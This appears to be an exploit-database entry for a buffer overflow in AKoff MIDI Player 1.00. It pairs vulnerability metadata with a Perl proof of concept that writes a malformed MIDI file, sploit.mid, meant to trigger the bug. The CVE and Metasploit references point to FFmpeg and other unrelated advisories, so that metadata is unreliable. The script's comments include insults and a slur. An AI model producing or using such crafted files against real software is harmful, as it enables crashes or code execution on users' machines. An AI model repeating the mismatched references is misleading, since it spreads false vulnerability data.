AKoff MIDI Player 1.00 Buffer Overflow Exploit

vendor:

MIDI Player

by:

cr4wl3r

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: MIDI Player

Affected Version From: 1.00

Affected Version To: 1.00

Patch Exists: YES

Related CWE: CVE-2009-0385

CPE: cpe:a:akoff:midi_player:1.00

Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-0698/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-0698/, https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-746-1/, https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-763-1/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-0385/, https://www.rapid7.com/db/vulnerabilities/freebsd-vid-6733e1bf-125f-11de-a964-0030843d3802/, https://www.rapid7.com/db/vulnerabilities/ffmpeg-cve-2009-0385/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

AKoff MIDI Player 1.00 Buffer Overflow Exploit

AKoff MIDI Player 1.00 is vulnerable to a buffer overflow vulnerability when processing specially crafted MIDI files. This vulnerability can be exploited by an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of AKoff MIDI Player.

Source

Exploit-DB raw data:

#!/usr/bin/perl

# AKoff MIDI Player 1.00 Buffer Overflow Exploit
# By cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
# gr33tz: str0ke, opt!x hacker, xoron, EA ngel, zvtral, Hmei7, mywisdom, cyberlog, irvian, and all my friend
# thanks: milw0rm, darkc0de, exploit-db, inj3ct0r, manadocoding, sekuritionline
# Fuck to buat loe tukang show off, dan buat loe yang mengaku dirinya hacker dan pamer sana-sini
# mengatakan orang lain lamer karena suka deface sedangkan dirinya adalah tukang deface
# you are 1337 lamer 1337 hoax and 1337 gay
# i'm injector and rooter in the site and i'm be silent

#`````````` ___ ____ ____
#````______/```\__//```\__/____\
#``_/```\_/``:```````````//____\
#`/|``````:``:``..``````/````````\    W A R N I N G !!! REMEMBER ME
#|`|`````::`````::``````\````````/
#|`|`````:|`````||`````\`\______/
#|`|`````||`````||``````|\``/``|
#`\|`````||`````||``````|```/`|`\
#``|`````||`````||``````|``/`/_\`\
#``|`___`||`___`||``````|`/``/````\
#```\_-_/``\_-_/`|`____`|/__/``````\
#````````````````_\_--_/````\`````/
#```````````````/____```````````/
#``````````````/`````\`````````/
#``````````````\______\_______/


$buff = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
###################################################################
open(file, "> sploit.mid");
print (file $buff);
###################################################################